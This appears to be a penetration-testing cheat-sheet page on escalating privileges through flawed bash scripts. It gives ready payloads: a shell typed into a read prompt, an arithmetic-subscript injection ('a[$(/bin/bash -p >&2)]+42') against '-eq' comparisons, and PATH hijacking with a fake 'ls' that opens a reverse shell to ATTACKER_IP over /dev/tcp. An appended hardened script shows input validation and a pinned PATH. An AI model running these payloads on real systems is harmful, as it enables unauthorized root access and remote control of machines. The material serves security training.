# Bash

## Theory

Bash scripting is a powerful tool used by system administrators and developers to automate tasks and streamline processes on Unix-like systems. However, like any software, bash scripts can be vulnerable to various security issues, which, if exploited, can lead to privilege escalation and unauthorized access.

## Practice

### Shell In Prompt

{% tabs %}
{% tab title="Enumerate" %}
If a bash script prompts for input with `read -p`, we can input `/bin/bash -i` to get a shell as another user.

```bash
$ cat /usr/bin/vuln-script.sh

#!/bin/bash
read -p "What's you name: "
```

{% endtab %}

{% tab title="Exploit" %}
We can input `/bin/bash -i` to get a shell.

```bash
$ sudo /usr/bin/sudo-script.sh

What's you name: /bin/bash -i
```

{% endtab %}
{% endtabs %}

### Bash eq

{% tabs %}
{% tab title="Enumerate" %}
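If a bash script uses the `-eq` comparison on user-controlled input inside `[[ ]]`, it's vulnerable to arbitrary command execution, because bash evaluates both operands as arithmetic expressions.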

```bash
$ cat /usr/bin/vuln-script.sh

#!/bin/bash
read -rp "Enter guess: " num

if [[ $num -eq 42 ]]
then
  echo "Correct"
else
  echo "Wrong"
fi
```

{% endtab %}

{% tab title="Exploit" %}
To execute an arbitrary command, answer the prompt as shown below. We have to inject the command before the correct number (42).

```bash
sudo /bin/bash /opt/example.sh
Enter guess: a[$(/bin/bash -p >&2)]+42

#Or execute your own malicious script
sudo /bin/bash /opt/example.sh
Enter guess: a[$(/tmp/shell.elf)]+42
```

{% hint style="info" %}
Bash evaluates the array subscript in `a[$(/tmp/shell.elf)]` as part of the arithmetic expression, so the command substitution inside it executes our script.
{% endhint %}
{% endtab %}
{% endtabs %}

### No Command Path Exploit

{% tabs %}
{% tab title="Enumerate" %}
If a bash script executes another command **without specifying its full path**, we can abuse it to escalate privileges.

```bash
$ cat /usr/bin/vuln-suid-script.sh

#!/bin/bash
ls /root/var/file
```

{% endtab %}

{% tab title="Exploit" %}
We can create a malicious file in the `/tmp` folder with the same name as the command that is called without its full path:

```bash
#Generate a payload
echo "bash -c '/bin/bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'" > /tmp/ls
chmod +x /tmp/ls

#Change Path env variable
export PATH=/tmp:$PATH

#Execute the suid script
/usr/bin/vuln-suid-script.sh
```

{% endtab %}
{% endtabs %}
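A hardened counterpart to the scripts in the "Bash eq" and "No Command Path Exploit" sections, as an added example that is not part of the original page. The function names `is_uint`, `check_guess` and `list_file` are hypothetical, and the sample inputs are constructed.

```bash
#!/bin/bash
# Added example, not from the original page. Function names are hypothetical.

# Pin PATH so bare command names cannot resolve to attacker-writable
# directories such as /tmp, whatever PATH the caller exported.
PATH=/usr/sbin:/usr/bin:/sbin:/bin
export PATH

# is_uint: succeed only for 1 to 9 decimal digits. The length bound keeps
# the value far below the point where shell integers overflow and wrap.
is_uint() {
  case $1 in
    '' | *[!0-9]*) return 1 ;;
  esac
  [ "${#1}" -le 9 ]
}

# check_guess: replacement for `[[ $num -eq 42 ]]`. The input is validated
# before any numeric comparison, so it is never evaluated as an arithmetic
# expression. Prints Correct, Wrong or Invalid.
check_guess() {
  if ! is_uint "$1"; then
    echo "Invalid"
    return 2
  fi
  if [ "$1" -eq 42 ]; then
    echo "Correct"
  else
    echo "Wrong"
    return 1
  fi
}

# list_file: call the external binary by absolute path and pass `--` so the
# argument cannot be parsed as an option.
list_file() {
  /bin/ls -- "$1"
}

# Constructed sample inputs. The last one has the shape of the injection
# string from the page, with a harmless command in the subscript; it is
# rejected as Invalid and the command never runs.
for guess in 42 7 'a[$(id >&2)]+42'; do
  printf '%s -> %s\n' "$guess" "$(check_guess "$guess" || true)"
done
```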
